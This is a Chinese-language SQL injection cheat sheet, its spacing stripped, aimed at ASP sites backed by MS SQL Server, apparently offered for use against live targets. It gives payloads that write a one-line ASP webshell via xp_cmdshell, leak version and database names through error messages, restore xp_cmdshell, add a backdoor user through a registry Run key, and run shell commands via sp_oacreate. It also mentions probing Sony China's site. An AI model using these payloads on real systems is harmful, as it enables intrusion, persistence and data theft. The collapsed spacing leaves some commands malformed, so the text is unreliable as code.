1、用^转义字符来写ASP(一句话木马)文件的方法:?192.168.1.5/display.asp?keyno=1881;execmaster.dbo.xp_cmdshell'echo^<scriptlanguage=VBScriptrunat=server^>executerequest^("l"^)^</script^>>c:\mu.asp';--?echo^<%execute^(request^("l"^)^)%^>>c:\mu.asp2、显示SQL系统版本:?192.168.1.5/display.asp?keyno=188and1=(select@@VERSION)?wwxxxx/FullStory.asp?id=1and1=convert(int,@@version)--MicrosoftVBScript编译器错误错误'800a03f6'缺少'End'/iisHelp/common/500-100.asp,行242MicrosoftOLEDBProviderforODBCDrivers错误'80040e07'[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue'MicrosoftSQLServer2000-8.00.760(IntelX86)Dec17200214:22:05Copyright(c)1988-2003MicrosoftCorporationDesktopEngineonWindowsNT5.0(Build2195:ServicePack4)'toacolumnofdatatypeint./display.asp,行173、在检测索尼中国的网站漏洞时,分明已经确定了漏洞存在却无法在这三种漏洞中找到对应的类型。偶然间我想到了在SQL语言中可以使用“in”关键字进行查询,例如“select*frommytablewhereidin(1)”,括号中的值就是我们提交的数据,它的结果与使用“select*frommytablewhereid=1”的查询结果完全相同。所以访问页面的时候在URL后面加上“)and1=1and1in(1”后原来的SQL语句就变成了“select*frommytablewhereidin(1)and1=1and1in(1)”,这样就会出现期待已久的页面了。暂且就叫这种类型的漏洞为“包含数字型”吧,聪明的你一定想到了还有“包含字符型”呢。对了,它就是由于类似“select*frommytablewherenamein('firstsee')”的查询语句造成的。4、判断xp_cmdshell扩展存储过程是否存在:192.168.1.5/display.asp?keyno=188and1=(selectcount(*)FROMmaster.dbo.sysobjectswherextype='X'ANDname='xp_cmdshell')恢复xp_cmdshell扩展存储的命令:wwtest/news/show1.asp?NewsId=125272;execmaster.dbo.sp_addextendedproc'xp_cmdshell','e:\inetput\web\xplog70.dll';--5、向启动组中写入命令行和执行程序:192.168.1.5/display.asp?keyno=188;EXECmaster.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe/cnetusertestptlove/add'6、查看当前的数据库名称:?192.168.1.5/display.asp?keyno=188and0<>db_name(n)n改成0,1,2,3……就可以跨库了?wwxxxx/FullStory.asp?id=1and1=convert(int,db_name())--MicrosoftVBScript编译器错误错误'800a03f6'缺少'End'/iisHelp/common/500-100.asp,行242MicrosoftOLEDBProviderforODBCDrivers错误'80040e07'[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue'huidahouse'toacolumnofdatatypeint./display.asp,行177、列出当前所有的数据库名称:select*frommaster.dbo.sysdatabases列出所有列的记录selectnamefrommaster.dbo.sysdatabases仅列出name列的记录8、不需xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD命令:createTABLEmytmp(infoVARCHAR(400),IDintIDENTITY(1,1)NOTNULL)DECLARE@shellINTDECLARE@fsoINTDECLARE@fileINTDECLARE@isEndBITDECLARE@outVARCHAR(400)EXECsp_oacreate'wscript.shell',@shelloutputEXECsp_oamethod@shell,'run',null,'cmd.exe/cdirc:\>c:\temp.txt','0','true'--注意run的参数true指的是将等待程序运行的结果,对于类似ping的长时间命令必需使用此参数。EXECsp_oacreate'scripting.filesystemobject',@fsooutputEXECsp_oamethod@fso,'opentextfile',@fileout,'c:\temp.txt'--因为fso的opentextfile方法将返回一个textstream对象,所以此时@file是一个对象令牌WHILE@shell>0BEGINEXECsp_oamethod@file,'Readline',@outoutinsertINTOMYTMP(info)VALUES(@out)EXECsp_oagetproperty@file,'AtEndOfStream',@isEndoutIF@isEnd=1BREAKELSECONTINUEENDdropTABLEMYTMP----------DECLARE@shellINTDECLARE@fsoINTDECLARE@fileINTDECLARE@isEndBITDECLARE@outVARCHAR(400)EXEC...